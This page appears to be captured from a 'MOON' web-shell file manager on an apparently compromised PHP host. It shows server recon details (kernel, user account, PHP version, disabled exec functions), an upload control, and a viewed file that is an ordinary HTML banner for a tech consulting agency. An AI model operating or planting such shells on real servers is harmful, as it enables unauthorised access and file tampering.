MOON
Server: Apache
System: Linux e2e-78-16.ssdcloudindia.net 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User: imensosw (1005)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/imensosw/.trash/banner.php
<section class="banner-hero" style="overflow:hidden;">
	<img src="images/desktop/lines.svg" class="line1" width="700" />
	<img src="images/desktop/lines.svg" class="line2" width="700" />	
	<div class="pattern1">
		<span class="red"></span>
		<span class="blue"></span>
		<span class="yellow"></span>
	</div>
	<div class="container">
		<div class="row">
			<div class="col-lg-8 text-center offset-lg-2 mt-5">
				<h1><span class="underline">Full Stack</span> Tech Consulting Agency</h1>
			</div>
		</div>
		<div class="row align-items-center mt-4">
			<div class="col-lg-6 offset-lg-3 text-center">
				<p class="big-p">From startups to big corporates, Imenso offers everything that needs to build world-class applications.</p>
				<a href="" class="btn btn-primary mt-4">Start a Project</a>	
			</div>
		</div>
	</div>
</section>